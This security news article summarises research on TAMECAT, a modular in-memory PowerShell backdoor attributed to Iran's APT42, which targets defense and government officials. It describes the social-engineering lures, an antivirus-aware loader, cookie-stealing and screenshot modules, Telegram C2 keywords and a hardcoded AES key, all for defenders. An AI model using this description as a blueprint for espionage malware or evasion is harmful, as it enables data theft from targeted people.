Ddos 
A sophisticated espionage campaign targeting senior defense and government officials has been linked to APT42, an Iranian state-sponsored actor associated with the Islamic Revolutionary Guard Corps (IRGC). At the heart of this campaign is TAMECAT, a complex, modular PowerShell backdoor designed to steal sensitive data while evading detection.
New analysis from Pulsedive Threat Research, citing findings from the Israel National Digital Agency, sheds light on the inner workings of this “fileless” threat.
Unlike “smash and grab” cyberattacks, APT42 operates with patience. The group leverages detailed social engineering to cultivate relationships with their targets—often posing as trusted contacts on platforms like WhatsApp—before striking.
“The group leverages social engineering to build rapport with victims over an extended period before gaining access to their environments.” — Pulsedive Threat Research / Israel National Digital Agency
This human-centric approach allows them to bypass traditional perimeter defenses by convincing high-value targets to open malicious links voluntarily.
Once inside, the attackers deploy TAMECAT, a PowerShell-based malware framework that resides primarily in memory. The analysis reveals a toolset built specifically for intelligence gathering.
“Israel’s National Digital Agency shared a breakdown of the in-memory modules available with TAMECAT. This included the ability to extract data from Microsoft Edge using remote debugging, screen captures, and suspending Chrome for data collection.” — Pulsedive Threat Research
The malware’s capabilities are vast and modular, allowing operators to push specific functionality as needed. Key modules identified include:
- Browser Module: Extracts cookies and history from Chrome, Edge, and Firefox.
- Screen Module: Captures screenshots of the victim’s desktop.
- FileCrawler Module: Scans the filesystem for documents of interest.
The infection chain begins with a VBScript file that performs a “health check” on the victim’s machine. It scans for installed antivirus products to decide how to proceed—using conhost to launch PowerShell if Windows Defender is present, or curl if it is not.
The loader, identified as nconf.txt (hosted on tebi.io), uses heavy obfuscation and encryption to hide its purpose. It employs custom functions with names like Gorba, Borjol, and Borpos to handle AES encryption and data manipulation.
- AES Encryption: The malware uses a hardcoded 256-bit AES key (
kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B) to secure its configuration and exfiltrated data. - C2 Infrastructure: TAMECAT communicates with its controllers using a variety of channels to blend in with legitimate traffic, including Cloudflare Workers, Discord, Telegram, and WebDAV servers.
One of the most notable features of TAMECAT is its integration with Telegram for command and control (C2). The malware listens for specific keywords from a Telegram bot to trigger actions:
Invest: Likely related to downloading payloads.Scene&Look: Commands associated with specific worker domains.#Journey: Used to set the decryption key.
“Reporting from Israel indicates that TAMECAT was observed being deployed in espionage campaigns targeting high-value senior defense and government officials.” — Pulsedive Threat Research
APT42’s use of TAMECAT demonstrates a shift toward modular, in-memory malware that is harder to detect and easier to update. For defenders, this underscores the importance of monitoring PowerShell activity and scrutinizing traffic to trusted services like Telegram and Cloudflare.
Related Posts:
- Iran’s APT42 Spies Target NGOs, Clouds in Espionage Campaign
- Iran APT SpearSpecter Uses Weeks-Long WhatsApp Lures and Fileless TAMECAT Backdoor to Hit Defense
- Iranian APT42 Ramps Up Phishing Campaigns Against Israel, U.S. Election Targets
- Iranian Hackers Target US Politicians on Meta Platforms
- Iranian APT “Educated Manticore” Unleashes AI-Powered Phishing & Keylogging Against Critics
Donate